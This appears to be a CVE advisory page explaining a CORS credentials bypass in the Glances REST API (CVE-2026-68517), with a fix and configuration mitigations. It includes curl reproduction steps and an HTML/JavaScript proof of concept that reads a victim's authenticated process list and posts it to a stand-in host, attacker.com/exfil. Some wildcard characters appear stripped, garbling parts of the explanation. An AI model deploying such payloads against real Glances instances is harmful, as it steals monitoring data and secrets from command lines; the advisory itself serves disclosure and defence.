Glances REST API, CORS Credentials Bypass, CVE-2026-68517 (MEDIUM) -DC-Aug2026-1540

Listen to this Post

How CVE-2026-68517 Works

Glances is an open-source, cross-platform system monitoring tool that exposes a RESTful API for retrieving real-time metrics. This API can be configured with Cross-Origin Resource Sharing (CORS) policies to control which external websites are allowed to make requests to it. The core of this vulnerability lies in a flawed safety check within the REST API server.
The code in `glances/outputs/glances_restful_api.py` was designed to enforce a documented guarantee: `cors_credentials=True` must never be combined with an unrestricted CORS origin allowlist (the wildcard ). To enforce this, a check was implemented: `if cors_origins == [""] and cors_credentials:`. This code looks to see if the `cors_origins` list is exactly equal to the single-element list `[""]`. If so, it disables credentials and logs a warning.
However, the problem is that the underlying web framework, Starlette's `CORSMiddleware`, uses a different logic to determine wildcard behavior. Instead of exact equality, it performs a membership test: it checks if `""` is present anywhere in the `allow_origins` list. If it is, Starlette treats the configuration as "allow all origins".
This discrepancy creates a dangerous blind spot. An administrator might configure a multi-entry origin list that includes the wildcard alongside a legitimate origin, for example: `cors_origins=,https://trusted.example.com`. The administrator may believe they are allowing `https://trusted.example.com` while mistakenly leaving the wildcard in place. Starlette's membership test sees the
and allows all origins. Glances’ own guard, however, performs an exact equality check (cors_origins == [""]), which fails because the list is ["", "https://trusted.example.com"]. Consequently, the guard’s safety mechanism is bypassed entirely, and `cors_credentials` remain enabled with no warning logged.
This allows any website, regardless of its origin, to issue a cross-origin request to the Glances API. Because the server responds with `Access-Control-Allow-Origin: ` and Access-Control-Allow-Credentials: true, the victim’s browser will automatically include cached HTTP Basic Auth credentials with the request. The attacker’s malicious site can then read the full, authenticated monitoring data from the victim’s Glances instance. This is the same exact-match-versus-membership-test bug that was previously fixed for the XML-RPC server (glances/server.py with CVE-2026-46608), but the REST API was never updated.

DailyCVE Form

Platform: Glances
Version: < 4.5.6
Vulnerability: CORS Credentials Bypass
Severity: MEDIUM (CVSS 6.5)
Date: 2026-08-17

Prediction: Already Patched (4.5.6)

What Undercode Say

The vulnerability stems from a logic flaw in the CORS credentials guard. The fix involves changing the exact equality check to a proper membership test.

Check current Glances version
glances --version
Check if the vulnerable code pattern exists (pre-4.5.6)
grep -n "cors_origins == [\"\"]" /path/to/glances/outputs/glances_restful_api.py
Example of a vulnerable configuration in glances.conf
[bash]
cors_origins=,https://trusted.example.com
cors_credentials=true
Command to reproduce the vulnerability (PoC)
1. Confirm authentication is required
curl -s -i http://127.0.0.1:61208/api/4/cpu
2. Send an authenticated request with an arbitrary Origin header
curl -s -i -u glances:password -H "Origin: https://attacker.com" \
http://127.0.0.1:61208/api/4/cpu

Exploit (Educational Purposes!)

An attacker can host a malicious website that, when visited by a user authenticated to a vulnerable Glances instance, exfiltrates sensitive monitoring data.

<!DOCTYPE html>
<html>
<body>

<script>
// This script will run when a victim visits the attacker's page.
// It attempts to fetch data from the vulnerable Glances REST API.
// The victim's browser will automatically include cached Basic Auth credentials.
fetch('http://<vulnerable-glances-ip>:61208/api/4/processlist', {
credentials: 'include' // This is key to sending the cached credentials
})
.then(response => response.json())
.then(data => {
// Exfiltrate the data, e.g., by sending it to a server controlled by the attacker.
fetch('https://attacker.com/exfil', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify(data)
});
})
.catch(error => console.error('Error:', error));
</script>

</body>
</html>

Protection

  1. Upgrade: The primary and most effective mitigation is to upgrade Glances to version 4.5.6 or later.
  2. Correct Configuration: If upgrading is not immediately possible, ensure that the `cors_origins` configuration does not contain the wildcard “ when `cors_credentials` is set to true. The list should only contain specific, trusted origins.
  3. Avoid Untrusted Sites: Until the upgrade is applied, users should avoid visiting untrusted or unknown websites while authenticated to the Glances REST API to prevent exploitation.

Impact

A successful exploit allows an attacker to read the complete, authenticated monitoring dataset from a victim’s Glances instance. This includes highly sensitive information such as:
Full process lists with command-line arguments, which often contain secrets like passwords, API keys, or other sensitive tokens passed as CLI flags.

Usernames associated with running processes.

Real-time system metrics including CPU usage, memory consumption, disk I/O, and network statistics.
This could lead to significant privacy breaches, operational intelligence leaks, and provide attackers with critical reconnaissance information for planning further attacks. The vulnerability compromises the confidentiality of the monitoring data but does not allow for privilege escalation or denial of service.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top